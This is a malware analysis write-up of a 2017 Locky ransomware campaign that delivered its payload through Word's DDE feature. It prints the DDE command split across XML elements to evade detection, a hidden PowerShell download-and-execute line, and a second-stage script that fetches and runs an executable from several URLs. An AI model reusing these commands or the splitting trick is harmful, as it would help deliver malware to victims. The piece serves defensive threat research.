Research

Locky Ransomware Actors Adopt DDE Technique to Deliver Malware

The actors behind the Locky ransomware family adopted the recently publicised Dynamic Data Exchange (DDE) protocol vulnerability to deliver their malware. The DDE technique has been around for some time, but was brought to wider attention by SensePost on October 9, 2017. The technique allows code execution inside Microsoft Word without requiring malicious VBA macros.

Other criminals had already adopted DDE by this point. The Hancitor malware authors adapted their documents to use DDE on Monday, October 16, as detailed by the SANS ISC.

The October 19 Locky campaign involved spam emails distributed by the Necurs botnet with the subject line “Emailed Invoice – [random digits]”, delivering a Word document attachment with a filename similar to I_.doc.

The Locky actors regularly rotate and innovate their delivery tactics. There was no Locky activity on October 16–17, 2017 and they appear to have used that window to weaponise the DDE feature for this campaign.

Analysis of the Malicious Document

The DDE payload is embedded in the word/document.xml component of the Office Open XML archive, a WordprocessingML file containing multiple XML entities.

The actors used an obfuscation technique also seen in the concurrent Hancitor campaign, breaking the malicious PowerShell command across several <w:instrText/> elements using the Rsid (Revision Identifier for Style Definition) attribute. This is a legitimate OpenXML feature for document merging that happens to be useful for splitting payloads across XML nodes.

A snippet of the embedded DDE command from document.xml:

<w:r w:rsidR="001E224B">
  <w:instrText>DDE</w:instrText>
</w:r>

The PowerShell download-and-execute routine follows (rsidR attributes removed for clarity):

<w:instrText>C:\\Windows\\System32\\</w:instrText>
<w:instrText>cmd</w:instrText>
<w:instrText>.exe</w:instrText>
<w:instrText xml:space="preserve"> </w:instrText>
<w:instrText>"</w:instrText>
<w:instrText xml:space="preserve">/k </w:instrText>
<w:instrText xml:space="preserve">powershell </w:instrText>
<w:instrText xml:space="preserve">-NoP -sta -NonI </w:instrText>
<w:instrText>-w hidden</w:instrText>
<w:instrText>$e=</w:instrText>
<w:instrText>(New-Object System.Net.WebClient).DownloadString('</w:instrText>
<w:instrText>http://ryanbaptistchurch.com/KJHDhbje71</w:instrText>

When the instrText fragments are reassembled, the full DDE command is:

DDE C:\\Windows\\System32\\cmd.exe "/k -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://ryanbaptistchurch.com/KJHDhbje71'); powershell -e $e"

This downloads the second-stage payload (a base64-encoded file) from:

hxxp://ryanbaptistchurch.com/KJHDhbje71

After base64 decoding, the second stage is a small PowerShell download-and-execute script:

$urls = "http://shamanic-extracts.biz/eurgf837or","http://centralbaptistchurchnj.org/eurgf837or","","http://conxibit.com/eurgf837or"

foreach($url in $urls){
    Try {
        Write-Host $url
        $fp = "$env:temp\rekakva32.exe"
        $wc = New-Object System.Net.WebClient
        $wc.DownloadFile($url, $fp)
        Start-Process $fp
        break
    }
    Catch {
        Write-Host $_.Exception.Message
    }
}

The third-stage binary downloaded by this script is a PE32 executable (MD5: 4f03e360be488a3811d40c113292bc01). This is the QTLoader downloader, analysed in detail in Locky Actors Adopt QTLoader to Deliver Ransomware.

← All research